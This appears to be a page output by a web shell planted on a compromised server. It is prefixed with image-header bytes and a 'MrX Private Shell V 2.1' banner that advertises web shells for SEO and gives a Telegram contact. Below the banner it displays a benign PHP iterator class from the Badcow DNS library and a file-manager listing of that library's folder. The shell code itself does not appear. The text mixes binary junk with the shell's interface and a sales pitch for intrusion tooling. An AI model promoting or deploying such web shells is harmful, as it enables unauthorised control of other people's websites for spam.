����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
declare(strict_types=1);
/*
* This file is part of Badcow DNS Library.
*
* (c) Samuel Williams <sam@badcow.co>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Badcow\DNS\Parser;
class ResourceRecordIterator extends \ArrayIterator
{
public function __construct(string $resourceRecord)
{
parent::__construct(explode(Tokens::SPACE, $resourceRecord));
}
/**
* Return pointer to previous position.
*/
public function prev(): void
{
if (!$this->valid()) {
$this->end();
return;
}
$this->seek((int) $this->key() - 1);
}
/**
* Set pointer to the end of the array.
*/
public function end(): void
{
$lastPos = $this->count() - 1;
$this->seek($lastPos);
}
/**
* Get all the remaining values of an iterator as an array. This will move the pointer to the end of the array.
*/
public function getRemainingAsString(): string
{
$values = [];
while ($this->valid()) {
$values[] = $this->current();
$this->next();
}
return implode(Tokens::SPACE, $values);
}
public function __toString(): string
{
return implode(Tokens::SPACE, $this->getArrayCopy());
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Comments.php | File | 982 B | 0644 |
|
| Normaliser.php | File | 6.26 KB | 0644 |
|
| ParseException.php | File | 1.27 KB | 0644 |
|
| Parser.php | File | 15.29 KB | 0644 |
|
| ResourceRecordIterator.php | File | 1.36 KB | 0644 |
|
| StringIterator.php | File | 1.75 KB | 0644 |
|
| TimeFormat.php | File | 2.5 KB | 0644 |
|
| Tokens.php | File | 621 B | 0644 |
|
| ZoneFileFetcherInterface.php | File | 734 B | 0644 |
|